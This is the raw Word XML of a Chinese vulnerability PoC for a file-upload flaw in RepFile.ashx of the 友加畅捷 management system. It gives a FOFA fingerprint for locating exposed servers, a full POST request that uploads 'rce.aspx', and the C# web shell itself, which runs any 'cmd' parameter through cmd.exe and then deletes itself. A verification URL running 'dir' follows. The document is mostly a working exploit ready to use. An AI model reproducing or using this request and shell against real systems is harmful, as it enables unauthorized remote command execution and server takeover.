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9B3B63">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">友加畅捷管理系统 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RepFile.ashx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件上传致RCE</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131692B4"/>
    <w:p w14:paraId="076DDB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FOFA：icon_hash="2049187099"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F67EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052CF02F"/>
    <w:p w14:paraId="376D7A65"/>
    <w:p w14:paraId="7A19E6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PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB95A80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA5F880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D56161"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>POST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/ReportDesign/RepFile.ashx?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RepFile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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>pages/rce.aspx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Type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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>SaveRepFileData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379969"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CEB99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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Host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eastAsia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127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B677D45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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>User-Agent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Mozilla/5.0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(ZZ;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Linux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x86_64)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AppleWebKit/537.36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(KHTML,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like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Gecko)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Chrome/141.0.0.0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Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DAC14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SOAPAction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</w:p>
    <w:p w14:paraId="616C421C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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Content-Type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/>
          <w:bCs/>
          <w:color w:val="6A5B6D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B71817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</w:p>
    <w:p w14:paraId="127577A0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&lt;script runat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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"server"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 xml:space="preserve"> language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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="808184"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>#"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142CCCAC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    protected void Page_Load(object sender, EventArgs e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076A8A3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D79A0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Response.Clear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9AE9DD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Response.ContentType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"text/plain";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD22F6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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7BDAD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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6065F89F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command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Request["cmd"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370480A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if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(string.IsNullOrEmpty(command))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC6223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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753D89D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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694AD91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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E512DB0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System.Diagnostics.ProcessStartInfo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psi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new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System.Diagnostics.ProcessStartInfo();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C63FD6A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psi.FileName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"cmd.exe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B7DB7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psi.Arguments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"/c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"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command;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AA058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psi.RedirectStandardOutput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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D0406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psi.UseShellExecute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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176645C7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psi.CreateNoWindow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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C107C7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(System.Diagnostics.Process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process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System.Diagnostics.Process.Start(psi))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101826E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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773DB57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(System.IO.StreamReader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reader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process.StandardOutput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC61B8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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F475F5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reader.ReadToEnd();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15752326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Response.Write(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD7B1F7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B57B2D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307926B0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D0B57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(System.Exception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ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C7513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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A6134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Response.Write("Error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executing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command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"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ex.Message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"\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAC014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Response.Write(ex.StackTrace);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B63128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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424BBCB1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finally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C57628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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6AA9E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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480DD4A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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEA350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filePath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Server.MapPath(Request.ServerVariables["SCRIPT_NAME"]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD1C93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System.IO.File.Delete(filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50D05A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DFC2F0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{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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F4AE8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 xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51382BCB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Response.End();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B06C6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E64F69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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5F174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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD67285">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F388202">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="73321453"/>
    <w:p w14:paraId="05E7B6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漏洞验证路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA3538">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B27F71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/Report/Pages/rce.aspx?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cmd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4"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E1C57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714A081E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EC4EA4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8655F7"/>
    <w:rsid w:val="1C9F1DD3"/>
    <w:rsid w:val="1D805D62"/>
    <w:rsid w:val="215764FD"/>
    <w:rsid w:val="21B170D7"/>
    <w:rsid w:val="2763117E"/>
    <w:rsid w:val="28D23588"/>
    <w:rsid w:val="3FE3732D"/>
    <w:rsid w:val="48DA7B42"/>
    <w:rsid w:val="4E772300"/>
    <w:rsid w:val="4F8D2775"/>
    <w:rsid w:val="75362061"/>
    <w:rsid w:val="7E7E2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144</Words>
  <Characters>1236</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1796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2025-11-05T02:56:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:21:06Z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eyJoZGlkIjoiMzEwNTM5NzYwMDRjMzkwZTVkZjY2ODkwMGIxNGU0OTUiLCJ1c2VySWQiOiIzMDk0MTQ5NTgifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>26A0A676E3F14A729C3A540747144A90_12</vt:lpwstr>
  </property>
</Properties>
</file>